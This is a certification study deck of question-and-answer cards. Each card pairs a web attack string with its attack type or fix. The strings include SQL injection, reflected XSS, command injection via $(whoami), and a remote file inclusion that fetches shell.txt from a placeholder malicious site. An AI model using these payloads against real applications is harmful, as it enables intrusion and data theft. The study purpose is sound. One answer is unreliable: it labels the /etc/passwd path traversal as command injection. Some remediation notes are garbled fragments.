3.4 Given a scenario, exploit application-based vulnerabilities

Question 1

What type of attack:

item-widget’;waitfor%20delay%20’00:00:20’;–

Answer 1

SQL Injection (Stacked)

• item-widget’;waitfor%20delay%20’00:00:20’;–
• Parameterized Queries

Question 2

Remediation

item-widget’;waitfor%20delay%20’00:00:20’;–

Answer 2

Parameterized Queries

• item-widget’;waitfor%20delay%20’00:00:20’;–

Question 3

What type of attack:

inner-tab’>alert (1)

Answer 3

Reflected Cross-Site Scripting (XSS)

Question 4

What is the remediation of the following?

inner-tab’>alert (1)

Answer 4

Input Sanitization < >
“,’,

• inner-tab’>alert (1)

Question 5

What type of attack:

search=Bob”%3e%3cimg%20src%3da%20oneerror%3dalert(1)%3

Answer 5

Reflected Cross-Site Scripting

Question 6

Remediation:

search=Bob”%3e%3cimg%20src%3da%20oneerror%3dalert(1)%3

Answer 6

Input Sanitization < >

“,’,

Question 7

What type of attack:

item=widget’ + convert(int,@@version) +’

Answer 7

SQL Injection (Error-based)

• item=widget’ + convert(int,@@version) +’
• Error comes from converting the (int)

Question 8

Remediation:

item=widget’ + convert(int,@@version) +’

Answer 8

Parameterized Queries

• SQL is always Parameterized Queries

Question 9

What type of attack:

logfile=%2fetc%2fpasswd%00

Answer 9

Command Injection

• logfile=%2fetc%2fpasswd%00
• Could not find definite answer why

Question 10

Remediation:

logfile=%2fetc%2fpasswd%00

Answer 10

Input Sanitization $ (.) (.)

• The attack is: Command Injection

Question 11

What type of attack:

site=www.exa’ping%20-c%2010%201ocalhost’mple.com

Answer 11

Command Injection

• site=www.exa’ping%20-c%2010%201ocalhost’mple.com
• Ping is the giveaway
• Input Sanitization …, \ , / , sandbox requests

Question 12

What type of attack:

item=widget%20union%20select%20null ,null ,@@version;–

Answer 12

SQL Injection (Union)

• item=widget%20union%20select%20null ,null ,@@version;–
• UNION is dead giveaway
• SQL is always Parameterized Queries

Question 13

What type of attack:

logfile=http:%2f%2fwww.malicious-site.com%2fshell.txt

Answer 13

Remote File Inclusion

• logfile=http:%2f%2fwww.malicious-site.com%2fshell.txt
• Input Sanitization … , \ , / , Sandbox Requests

Question 14

What type of attack is this?

lookup=$(whoami)

Answer 14

Command Injection

• lookup=$(whoami)

Question 15

What is the remediation of the following:

logfile=http:%2f%2fwww.malicious-site.com%2fshell.txt

Answer 15

Input Sanitization … , \ , / , Sandbox Requests

Question 16

Remediation:

lookup=$(whoami)

Answer 16

Input Sanitization ‘,$(.)(.).

Question 17

What type of attack:

redir=http:%2f%2fwww.malicious-site.com

Answer 17

URL Redirect

Question 18

Remediation:

redir=http:%2f%2fwww.malicious-site.com

Answer 18

Prevent External Calls

Question 19

Common SQL Commands and Syntax

Answer 19

https://learning.oreilly.com/library/view/comptia-pentest-certification/9781260460056/f0166-01.jpg